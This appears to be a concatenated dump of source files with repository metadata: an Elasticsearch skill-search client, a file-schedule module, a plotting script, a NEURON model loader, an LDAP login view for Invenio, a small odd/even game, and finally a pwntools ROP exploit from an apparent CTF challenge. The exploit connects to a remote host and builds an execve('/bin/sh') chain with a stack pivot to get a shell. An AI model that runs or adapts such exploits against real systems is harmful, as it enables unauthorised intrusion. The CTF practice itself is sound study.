] | 108 | 2017-05-11T22:33:39.000Z | 2022-03-04T03:04:51.000Z | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
] | null | null | null | tests/skillsearch/clients.py | allenai/alexafsm | 0c2e8842ddbb4a34ac64a5139e7febee3b28889a | [
"Apache-2.0"
] | 17 | 2017-05-12T23:26:38.000Z | 2020-04-20T19:39:54.000Z | """Client that handles query to elasticsearch"""
import string
from typing import List, Tuple
from elasticsearch_dsl import Search
from alexafsm.test_helpers import recordable as rec
from elasticsearch_dsl.response import Response
from tests.skillsearch.skill_settings import SkillSettings
from tests.skillsearch.skill import Skill, INDEX
from tests.skillsearch.dynamodb import DynamoDB
es_search: Search = Search(index=INDEX).source(excludes=['html'])
def get_es_skills(query: str, top_n: int, category: str = None, keyphrase: str = None) -> Tuple[int, List[Skill]]:
"""Return the total number of hits and the top_n skills"""
result = get_es_results(query, category, keyphrase).to_dict()
return result['hits']['total'], [Skill.from_es(h) for h in result['hits']['hits'][:top_n]]
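# Usage sketch (editor's addition; the query string is hypothetical):
#   total, skills = get_es_skills('weather forecast', top_n=3)
#   # total is the overall hit count; skills holds at most 3 Skill objects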
def recordable(func):
def _get_record_dir():
return SkillSettings().get_record_dir()
def _is_playback():
return SkillSettings().playback
def _is_record():
return SkillSettings().record
return rec(_get_record_dir, _is_playback, _is_record)(func)
@recordable
def get_es_results(query: str, category: str, keyphrase: str) -> Response:
results = _get_es_results(query, category, keyphrase, strict=True)
if len(results.hits) == 0:
# relax constraints a little
return _get_es_results(query, category, keyphrase, strict=False)
else:
return results
def _get_es_results(query: str, category: str, keyphrase: str, strict: bool) -> Response:
skill_search = es_search
if category:
skill_search = skill_search.query('match',
category=string.capwords(category)
.replace(' And ', ' & ')
.replace('Movies & Tv', 'Movies & TV'))
if keyphrase:
skill_search = skill_search.query('match', keyphrases=keyphrase)
if query:
operator = 'and' if strict else 'or'
skill_search = skill_search.query('multi_match',
query=query,
fields=['name', 'description', 'usages', 'keyphrases'],
minimum_should_match='50%',
operator=operator) \
.highlight('description', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('title', order='score', pre_tags=['*'], post_tags=['*']) \
.highlight('usages', order='score', pre_tags=['*'], post_tags=['*'])
return skill_search.execute()
@recordable
def get_user_info(user_id: str, request_id: str) -> dict: # NOQA
"""Get information of user with user_id from dynamodb. request_id is simply there so that we can
record different responses from dynamodb for the same user during playback"""
return DynamoDB().get_user_info(user_id)
@recordable
def register_new_user(user_id: str):
DynamoDB().register_new_user(user_id)
| 37.575 | 109 | 0.633733 | 355 | 3,006 | 5.157746 | 0.31831 | 0.048061 | 0.032769 | 0.046423 | 0.254506 | 0.198252 | 0.131076 | 0.050246 | 0.050246 | 0.050246 | 0 | 0.001335 | 0.252162 | 3,006 | 79 | 110 | 38.050633 | 0.813167 | 0.098802 | 0 | 0.056604 | 0 | 0 | 0.057292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169811 | false | 0 | 0.150943 | 0.056604 | 0.490566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74bee176de16cba930d5ae5c1c4a6c4a4161b92 | 9,380 | py | Python | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | pypsych/schedule.py | janmtl/pypsych | 1c606342dbdb984bc06aa9fd26963f3ce0a378b1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Includes the Schedule class, validation functions, and compilation functions
for compiling a schedule of files to process.
Methods:
compile: shortcut for validating the loaded configuration, then
performing the search, and _resolve functions
load: load the schedule.yaml file into a dictionary
get_file_paths: return a dictionary of files for a given subject, task, and
data source.
search: search the data_path for all files matching the patterns.
validate_schema: validate yaml contents against the schedule configuration
schema.
validate_data_source_names: validates that the data source names contained
in the configuration match a given list of possible data source names
validate_patterns: validates that the regex patterns return named fields
matching a list of required named fields
Configuration schema (YAML):
{task_name (str):
{data_source_name (str):
{filetype (str): pattern (str)}
}
}
"""
from schema import Schema
import os
import re
import pandas as pd
import numpy as np
import functools
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
# TODO(janmtl): Schedule should extend pd.DataFrame
class Schedule(object):
"""
An object for scheduling files to be processed by data sources.
Args:
path (str): path to YAML schedule configuration file.
Attributes:
path (str): path to YAML schedule configuration file.
raw (dict): the dictionary resulting from the YAML configuration.
        sched_df (pandas.DataFrame): a Pandas DataFrame listing all files found
"""
def __init__(self, raw):
self.raw = self.validate_schema(raw)
self.sched_df = None
self.subjects = []
self.valid_subjects = []
self.invalid_subjects = []
@memoize
def get_subschedule(self, task_name, data_source_name):
"""Fetches the schedule for a given task and data source."""
return self.raw[task_name][data_source_name]
def compile(self, data_paths):
"""Search the data path for the files to add to the schedule."""
# TODO(janmtl): this should accept globs
# TODO(janmtl): should be able to pass a list of excluded subjects
        if not isinstance(data_paths, list):
            data_paths = [data_paths]
files_df = self.search(self.raw, data_paths)
self.sched_df = self._resolve(files_df)
self.sched_df[['Subject', 'Task_Order']] = \
self.sched_df[['Subject', 'Task_Order']].astype(np.int64)
self.subjects = list(np.unique(self.sched_df['Subject']))
# TODO(janmtl): The function that checks the integrity of a subject's data
# should also return which subjects are broken and why
def validate_files(self):
"""Iterate over subjects and make sure that they all have all the files
they need."""
cf = (self.sched_df.pivot_table(index='Subject',
columns=['Data_Source_Name',
'Task_Name',
'File'],
values='Path',
aggfunc=lambda x: len(x)) == 1)
return cf
def remove_subject(self, subject_id):
self.sched_df = self.sched_df[self.sched_df['Subject'] != subject_id]
if subject_id in self.subjects:
self.subjects.remove(subject_id)
def isolate_subjects(self, subject_ids):
self.sched_df = self.sched_df[self.sched_df['Subject']
.isin(subject_ids)]
self.subjects = subject_ids
def isolate_tasks(self, task_names):
self.sched_df = self.sched_df[self.sched_df['Task_Name']
.isin(task_names)]
def isolate_data_sources(self, data_source_names):
self.sched_df = self.sched_df[self.sched_df['Data_Source_Name']
.isin(data_source_names)]
def get_file_paths(self, subject_id, task_name, data_source_name):
"""Return all a dictionary of all files for a given subject, task,
and data source."""
if self.sched_df.empty:
raise Exception('Schedule is empty, try Schedule.compile(path).')
sub_df = self.sched_df[
(self.sched_df['Subject'] == subject_id)
& (self.sched_df['Task_Name'] == task_name)
& (self.sched_df['Data_Source_Name'] == data_source_name)
]
if sub_df.empty:
raise Exception(
'({}, {}, {}) not found in schedule.'.format(subject_id,
task_name,
data_source_name)
)
list_of_files = sub_df[['File', 'Path']].to_dict('records')
files_dict = {ds['File']: ds['Path'] for ds in list_of_files}
return files_dict
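    # Usage sketch (editor's addition; paths and names are hypothetical):
    #   sched = Schedule(raw=config_dict)          # parsed schedule.yaml contents
    #   sched.compile(['/data/study1'])
    #   files = sched.get_file_paths(subject_id=101, task_name='Stroop',
    #                                data_source_name='EPrime')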
@staticmethod
def search(raw, data_paths):
"""Search the data paths for matching file patterns and return a pandas
DataFrame of the results."""
files_dict = []
for task_name, task in raw.iteritems():
for data_source_name, patterns in task.iteritems():
for pattern_name, pattern in patterns.iteritems():
for data_path in data_paths:
for root, _, files in os.walk(data_path):
for filepath in files:
file_match = re.match(pattern, filepath)
if file_match:
fd = file_match.groupdict()
fd['Task_Name'] = task_name
fd['Data_Source_Name'] = data_source_name
fd['File'] = pattern_name
fd['Path'] = os.path.join(root, filepath)
files_dict.append(fd)
files_df = pd.DataFrame(files_dict)
files_df.fillna({'Task_Order': 0}, inplace=True)
files_df[['Subject', 'Task_Order']] = \
files_df[['Subject', 'Task_Order']].astype(np.int64)
return files_df
@staticmethod
def _resolve(files_df):
"""
Resolve any files that matched multiple Task_Order values and
return a subset of the Data Frame.
Args:
files_df (pandas.DataFrame): a DataFrame resulting from
Schedule.search().
"""
counter = files_df.groupby(['Subject',
'Data_Source_Name',
'File',
'Task_Name'])['Task_Order'].count()
maps = counter[counter == 1]
maps = maps.reset_index()
maps.drop('Task_Order', axis=1, inplace=True)
orders = pd.merge(maps, files_df)[['Subject',
'Task_Name',
'Task_Order']]
orders.drop_duplicates(inplace=True)
sched_df = pd.merge(orders, files_df)[['Subject',
'Task_Name',
'Task_Order',
'File',
'Data_Source_Name',
'Path']]
return sched_df
@staticmethod
def validate_schema(raw):
"""Validate the schedule dictionary against the schema described
above."""
schema = Schema({str: {str: {str: str}}})
return schema.validate(raw)
@staticmethod
def validate_data_source_names(raw, data_source_names):
"""
Validate that all data source names are contained in the
data_source_names list.
Args:
data_source_names (list(str)): list of valid data source names
implemented in pypsych.
"""
for _, task in raw.iteritems():
for data_source_name in task.keys():
if data_source_name not in data_source_names:
raise Exception(
'Schedule could not validate data source ',
data_source_name
)
@staticmethod
def validate_patterns(raw):
"""Validate that all file pattern regex expressions yield Task_Order
and Subject fields."""
for _, task in raw.iteritems():
for _, data_source in task.iteritems():
for _, pattern in data_source.iteritems():
compiled_pattern = re.compile(pattern)
for group_name in compiled_pattern.groupindex.keys():
if group_name not in ['Task_Order', 'Subject']:
raise Exception(
'Schedule could not validate pattern ',
pattern
)
| 38.921162 | 79 | 0.552452 | 1,049 | 9,380 | 4.753098 | 0.203051 | 0.070197 | 0.050742 | 0.02868 | 0.224027 | 0.170678 | 0.13197 | 0.094665 | 0.056358 | 0.041115 | 0 | 0.001502 | 0.361301 | 9,380 | 240 | 80 | 39.083333 | 0.830746 | 0.269403 | 0 | 0.122302 | 0 | 0 | 0.084354 | 0.003477 | 0 | 0 | 0 | 0.008333 | 0 | 1 | 0.115108 | false | 0 | 0.043165 | 0 | 0.223022 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74d4d6162ae8c2a70fd86d11e2efc802d6df3be | 1,202 | py | Python | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | figthesis/figshape.py | Gattocrucco/sipmfilter | 74215d6c53b998808fc6c677b46030234d996bdf | [
"CC-BY-4.0",
"MIT"
] | null | null | null | import numpy as np
from matplotlib import pyplot as plt
import figlatex
import template
import afterpulse_tile21
styles = {
5.5: dict(color='#f55'),
7.5: dict(hatch='//////', facecolor='#0000'),
9.5: dict(edgecolor='black', facecolor='#0000'),
}
fig, ax = plt.subplots(num='figshape', clear=True, figsize=[7, 3.3])
for vov, style in styles.items():
ap21 = afterpulse_tile21.AfterPulseTile21(vov)
templates = []
for files in ap21.filelist:
file = files['templfile']
templ = template.Template.load(file)
kw = dict(timebase=1, aligned=True, randampl=False)
y, = templ.generate(templ.template_length, [0], **kw)
templates.append(y)
m = np.mean(templates, axis=0)
s = np.std(templates, axis=0, ddof=1)
norm = np.min(m)
ax.fill_between(np.arange(len(m)), (m - s) / norm, (m + s) / norm, label=f'{vov} V', zorder=2, **style)
ax.minorticks_on()
ax.grid(True, 'major', linestyle='--')
ax.grid(True, 'minor', linestyle=':')
ax.legend(title='Overvoltage')
ax.set_xlabel('Sample number after trigger @ 1 GSa/s')
ax.set_xlim(0, 1000)
fig.tight_layout()
fig.show()
figlatex.save(fig)
| 24.04 | 107 | 0.62396 | 170 | 1,202 | 4.364706 | 0.570588 | 0.020216 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042887 | 0.204659 | 1,202 | 49 | 108 | 24.530612 | 0.733264 | 0 | 0 | 0 | 0 | 0 | 0.091514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e74e18233e68e6e6e2b6b4650e8d71aa16535204 | 5,559 | py | Python | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | eFELunit/utils.py | appukuttan-shailesh/eFELunit | 055385254875249293da72c1daf2d489033cb9da | [
"BSD-3-Clause"
] | null | null | null | """
Module for loading BluePyOpt optimized model files
"""
import os
import sciunit
from neuronunit.capabilities import ReceivesSquareCurrent, ProducesMembranePotential, Runnable
from neuron import h
import neo
from quantities import ms
import zipfile
import json
import collections
class CellModel(sciunit.Model,
ReceivesSquareCurrent,
ProducesMembranePotential,
Runnable):
def __init__(self, model_path=None, model_name=None, run_alerts=False):
# `model_path` is the path to the model's directory
if not os.path.isdir(model_path):
raise IOError("Invalid model path: {}".format(model_path))
if not model_name:
file_name = os.path.basename(model_path)
model_name = file_name.split(".")[0]
self.model_name = model_name
self.base_path = model_path
self.owd = os.getcwd() # original working directory saved to return later
self.run_alerts = run_alerts
self.load_mod_files()
self.load_cell_hoc()
# get model template name
# could also do this via other JSON, but morph.json seems dedicated for template info
with open(os.path.join(self.base_path, "config", "morph.json")) as morph_file:
model_template = list(json.load(morph_file, object_pairs_hook=collections.OrderedDict).keys())[0]
# access model config info
with open(os.path.join(self.base_path, "config", "parameters.json")) as params_file:
params_data = json.load(params_file, object_pairs_hook=collections.OrderedDict)
# extract v_init and celsius (if available)
v_init = None
celsius = None
try:
for item in params_data[model_template]["fixed"]["global"]:
# would have been better if info was stored inside a dict (rather than a list)
if "v_init" in item:
item.remove("v_init")
v_init = float(item[0])
if "celsius" in item:
item.remove("celsius")
celsius = float(item[0])
        except Exception:
            pass
if v_init == None:
h.v_init = -70.0
print("Could not find model specific info for `v_init`; using default value of {} mV".format(str(h.v_init)))
else:
h.v_init = v_init
if celsius == None:
h.celsius = 34.0
print("Could not find model specific info for `celsius`; using default value of {} degrees Celsius".format(str(h.celsius)))
else:
h.celsius = celsius
self.cell = getattr(h, model_template)(os.path.join(str(self.base_path), "morphology"))
self.iclamp = h.IClamp(0.5, sec=self.cell.soma[0])
self.vm = h.Vector()
self.vm.record(self.cell.soma[0](0.5)._ref_v)
sciunit.Model.__init__(self, name=model_name)
def load_mod_files(self):
os.chdir(self.base_path)
libpath = "x86_64/.libs/libnrnmech.so.0"
os.system("nrnivmodl mechanisms") # do nrnivmodl in mechanisms directory
if not os.path.isfile(os.path.join(self.base_path, libpath)):
raise IOError("Error in compiling mod files!")
h.nrn_load_dll(str(libpath))
os.chdir(self.owd)
def load_cell_hoc(self):
with open(os.path.join(self.base_path, self.model_name+'_meta.json')) as meta_file:
meta_data = json.load(meta_file, object_pairs_hook=collections.OrderedDict)
best_cell = meta_data["best_cell"]
self.hocpath = os.path.join(self.base_path,"checkpoints",str(best_cell))
if os.path.exists(self.hocpath):
print("Model = {}: using (best cell) {}".format(self.model_name,best_cell))
else:
self.hocpath = None
for filename in os.listdir(os.path.join(self.base_path, "checkpoints")):
if filename.startswith("cell") and filename.endswith(".hoc"):
self.hocpath = os.path.join(self.base_path, "checkpoints", filename)
print("Model = {}: cell.hoc not found in /checkpoints; using {}".format(self.model_name,filename))
break
if not os.path.exists(self.hocpath):
raise IOError("No appropriate .hoc file found in /checkpoints")
h.load_file(str(self.hocpath))
def get_membrane_potential(self):
"""Must return a neo.AnalogSignal."""
signal = neo.AnalogSignal(self.vm,
units="mV",
sampling_period=h.dt * ms)
return signal
def inject_current(self, current):
"""
Injects somatic current into the model.
Parameters
----------
current : a dictionary like:
{'amplitude':-10.0*pq.pA,
'delay':100*pq.ms,
'duration':500*pq.ms}}
where 'pq' is the quantities package
"""
self.iclamp.amp = current["amplitude"]
self.iclamp.delay = current["delay"]
self.iclamp.dur = current["duration"]
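    # Usage sketch (editor's addition; pq is the quantities package, as in the
    # docstring above):
    #   model.inject_current({'amplitude': -10.0*pq.pA, 'delay': 100*pq.ms,
    #                         'duration': 500*pq.ms})
    #   model.run(tstop=700)
    #   vm = model.get_membrane_potential()  # neo.AnalogSignal in mV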
def run(self, tstop):
t_alert = 100.0
h.check_simulator()
h.cvode.active(0)
self.vm.resize(0)
h.finitialize(h.v_init)
while h.t < tstop:
h.fadvance()
if self.run_alerts and h.t > t_alert:
print("\tTime: {} ms out of {} ms".format(t_alert, tstop))
t_alert += 100.0
| 40.282609 | 135 | 0.589674 | 701 | 5,559 | 4.536377 | 0.296719 | 0.024528 | 0.037736 | 0.030818 | 0.178616 | 0.142138 | 0.096541 | 0.086164 | 0.07673 | 0.025157 | 0 | 0.010299 | 0.301313 | 5,559 | 137 | 136 | 40.576642 | 0.808445 | 0.129879 | 0 | 0.029703 | 0 | 0 | 0.125791 | 0.00591 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059406 | false | 0.009901 | 0.089109 | 0 | 0.168317 | 0.049505 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7505d6ec1c66fa5c31c1b68248657004784ebb2 | 5,401 | py | Python | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | 1 | 2018-12-25T23:18:35.000Z | 2018-12-25T23:18:35.000Z | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | 6 | 2018-12-12T17:15:11.000Z | 2020-01-22T14:00:07.000Z | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | null | null | null | """Invenio-LDAPClient login view."""
from __future__ import absolute_import, print_function
import uuid
from flask import Blueprint, after_this_request
from flask import current_app as app
from flask import flash, redirect, render_template, request
from flask_security import login_user
from invenio_accounts.models import User
from invenio_db import db
from invenio_userprofiles.models import UserProfile
from ldap3 import ALL, ALL_ATTRIBUTES, Connection, Server
from werkzeug.local import LocalProxy
from .forms import login_form_factory
_security = LocalProxy(lambda: app.extensions['security'])
_datastore = LocalProxy(lambda: _security.datastore)
blueprint = Blueprint(
'invenio_ldapclient',
__name__,
template_folder='templates',
static_folder='static',
)
def _commit(response=None):
_datastore.commit()
return response
def _ldap_connection(form):
"""Make LDAP connection based on configuration."""
if not form.validate_on_submit():
return False
form_pass = form.password.data
form_user = form.username.data
if not form_user or not form_pass:
return False
if app.config['LDAPCLIENT_CUSTOM_CONNECTION']:
return app.config['LDAPCLIENT_CUSTOM_CONNECTION'](
form_user, form_pass
)
ldap_server_kwargs = {
'port': app.config['LDAPCLIENT_SERVER_PORT'],
'get_info': ALL,
'use_ssl': app.config['LDAPCLIENT_USE_SSL']
}
if app.config['LDAPCLIENT_TLS']:
ldap_server_kwargs['tls'] = app.config['LDAPCLIENT_TLS']
server = Server(
app.config['LDAPCLIENT_SERVER_HOSTNAME'],
**ldap_server_kwargs
)
ldap_user = "{}={},{}".format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'],
form_user,
app.config['LDAPCLIENT_BIND_BASE']
)
return Connection(server, ldap_user, form_pass)
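# Editor's sketch of the app configuration this helper reads (values are examples):
#   LDAPCLIENT_SERVER_HOSTNAME = 'ldap.example.org'
#   LDAPCLIENT_SERVER_PORT = 389
#   LDAPCLIENT_USE_SSL = True
#   LDAPCLIENT_USERNAME_ATTRIBUTE = 'uid'
#   LDAPCLIENT_BIND_BASE = 'ou=people,dc=example,dc=org'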
def _search_ldap(connection, username):
"""Fetch the user entry from LDAP."""
search_attribs = app.config['LDAPCLIENT_SEARCH_ATTRIBUTES']
if search_attribs is None:
search_attribs = ALL_ATTRIBUTES
connection.search(
app.config['LDAPCLIENT_SEARCH_BASE'],
'({}={})'.format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'], username
),
attributes=search_attribs)
def _register_or_update_user(entries, user_account=None):
"""Register or update a user."""
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
username = entries[app.config['LDAPCLIENT_USERNAME_ATTRIBUTE']].values[0]
    full_name = ''
    if 'LDAPCLIENT_FULL_NAME_ATTRIBUTE' in app.config:
        full_name = entries[app.config[
            'LDAPCLIENT_FULL_NAME_ATTRIBUTE'
        ]].values[0]
if user_account is None:
kwargs = dict(email=email, active=True, password=uuid.uuid4().hex)
_datastore.create_user(**kwargs)
user_account = User.query.filter_by(email=email).one_or_none()
profile = UserProfile(user_id=int(user_account.get_id()))
else:
user_account.email = email
db.session.add(user_account)
profile = user_account.profile
profile.full_name = full_name
profile.username = username
db.session.add(profile)
return user_account
def _find_or_register_user(connection, username):
"""Find user by email, username or register a new one."""
    _search_ldap(connection, username)
    # Guard against an empty result set before indexing into it.
    if not connection.entries:
        return None
    entries = connection.entries[0]
try:
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
except IndexError:
# Email is required
return None
# Try by username first
user = User.query.join(UserProfile).filter(
UserProfile.username == username
).one_or_none()
# Try by email next
if not user and app.config['LDAPCLIENT_FIND_BY_EMAIL']:
user = User.query.filter_by(email=email).one_or_none()
if user:
if not user.active:
return None
return _register_or_update_user(entries, user_account=user)
# Register new user
if app.config['LDAPCLIENT_AUTO_REGISTRATION']:
return _register_or_update_user(entries)
@blueprint.route('/ldap-login', methods=['GET', 'POST'])
def ldap_login():
"""
LDAP login form view.
Process login request using LDAP and register
the user if needed.
"""
form = login_form_factory(app)()
if form.validate_on_submit():
connection = _ldap_connection(form)
if connection and connection.bind():
after_this_request(_commit)
user = _find_or_register_user(connection, form.username.data)
if user and login_user(user, remember=False):
next_page = request.args.get('next')
# Only allow relative URL for security
if not next_page or next_page.startswith('http'):
next_page = app.config['SECURITY_POST_LOGIN_VIEW']
connection.unbind()
db.session.commit()
return redirect(next_page)
else:
connection.unbind()
flash("We couldn't log you in, please contact your administrator.") # noqa
else:
flash("We couldn't log you in, please check your password.")
return render_template(
app.config['SECURITY_LOGIN_USER_TEMPLATE'],
login_user_form=form
)
| 29.839779 | 91 | 0.672098 | 650 | 5,401 | 5.324615 | 0.236923 | 0.054608 | 0.098815 | 0.030049 | 0.171338 | 0.12453 | 0.088992 | 0.067033 | 0.050852 | 0 | 0 | 0.001688 | 0.231994 | 5,401 | 180 | 92 | 30.005556 | 0.83269 | 0.072949 | 0 | 0.096 | 0 | 0 | 0.148597 | 0.092267 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048 | false | 0.048 | 0.096 | 0 | 0.248 | 0.032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
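For reference, a minimal sketch of the configuration keys this view reads; the key names are taken from the code above, while all values are illustrative assumptions rather than defaults shipped by invenio-ldapclient:

# Hypothetical Flask/Invenio config values for the LDAP login view.
LDAPCLIENT_SERVER_HOSTNAME = 'ldap.example.org'
LDAPCLIENT_SERVER_PORT = 636
LDAPCLIENT_USE_SSL = True
LDAPCLIENT_TLS = None                  # or an ldap3.Tls object
LDAPCLIENT_CUSTOM_CONNECTION = None    # or a callable (user, password) -> Connection
LDAPCLIENT_USERNAME_ATTRIBUTE = 'uid'
LDAPCLIENT_EMAIL_ATTRIBUTE = 'mail'
LDAPCLIENT_FULL_NAME_ATTRIBUTE = 'displayName'
LDAPCLIENT_BIND_BASE = 'ou=people,dc=example,dc=org'
LDAPCLIENT_SEARCH_BASE = 'dc=example,dc=org'
LDAPCLIENT_SEARCH_ATTRIBUTES = None    # None -> ldap3.ALL_ATTRIBUTES
LDAPCLIENT_FIND_BY_EMAIL = True
LDAPCLIENT_AUTO_REGISTRATION = True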
e750a7db318e1b1722b11d4663f54e8a2e8abb6a | 1,125 | py | Python | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | 4 | 2021-04-23T18:07:58.000Z | 2021-05-12T11:38:14.000Z | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | null | null | null | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | null | null | null | from random import randint
perder = ganhou = 0
# perder = losses, ganhou = wins (Portuguese identifiers kept as-is)
print('\n=-=-=-=-TRY TO BEAT ME AT ODD OR EVEN!=-=-=-=-\n')
while True:
    print('-=' * 15)
    eu = int(input('Type a number: '))
    pc = randint(1, 100)
    i_p = ' '
    while i_p not in ('I', 'P'):
        # I = odd ("impar"), P = even ("par"); [:1] avoids an IndexError on empty input
        i_p = input('Do you choose odd or even? [I/P]: ').strip().upper()[:1]
    soma = eu + pc
    print('-=' * 15)
    if i_p == 'P' and soma % 2 == 0:
        print(f'YOU WON!\nThe computer chose {pc} and you chose {eu}; the sum is {soma}, which is EVEN.')
        ganhou += 1
    elif i_p == 'I' and soma % 2 != 0:
        print(f'YOU WON!\nThe computer chose {pc} and you chose {eu}; the sum is {soma}, which is ODD.')
        ganhou += 1
    else:
        if soma % 2 == 0:
            x = 'EVEN'
        else:
            x = 'ODD'
        print(f'THE COMPUTER WON!\nThe computer chose {pc} and you chose {eu}; the sum is {soma}, which is {x}.')
        perder += 1
    if perder != 0:
        break
print('-' * 50)
print(f'You LOST! You managed to win {ganhou} time(s) in a row!')
print('-' * 50)
| 31.25 | 113 | 0.533333 | 172 | 1,125 | 3.447674 | 0.354651 | 0.020236 | 0.030354 | 0.131535 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0 | 0.031766 | 0.300444 | 1,125 | 35 | 114 | 32.142857 | 0.721728 | 0 | 0 | 0.25 | 0 | 0.09375 | 0.413333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0.28125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7531c6aec53aa133b091d9c44add5e29edc53d4 | 446 | py | Python | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | 4 | 2021-08-01T07:53:26.000Z | 2021-09-08T08:50:09.000Z | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | null | null | null | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | 1 | 2022-03-22T10:13:53.000Z | 2022-03-22T10:13:53.000Z | from pwn import *
import time
context.arch = "amd64"
ip = "140.110.112.77"
port = 3122
r = remote(ip, port)
# r = process("./rop1")
# Gadget and buffer addresses in the (static) rop1 binary.
data = 0x6ccd60             # writable memory that will serve as the pivoted stack
pop_rsi = 0x401637          # pop rsi ; ret
pop_rax_rdx_rbx = 0x478616  # pop rax ; pop rdx ; pop rbx ; ret
pop_rdi = 0x401516          # pop rdi ; ret
syscall = 0x4672b5          # syscall
leave = 0x4009e4            # leave ; ret (stack pivot)
# First input lands at `data`: a chain for execve("/bin/sh", 0, 0) with
# rax=0x3b, rdi=&"/bin/sh" (stored at data + 10*8), rsi=0, rdx=0.
# 0xdeadbeef is filler that the `leave` pivot pops into rbp.
r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))
# Second input overflows a 32-byte stack buffer: saved rbp <- data,
# return address <- `leave` gadget, pivoting rsp onto the chain above.
r.sendlineafter("=", b'a' * 32 + flat(data, leave))
r.interactive()
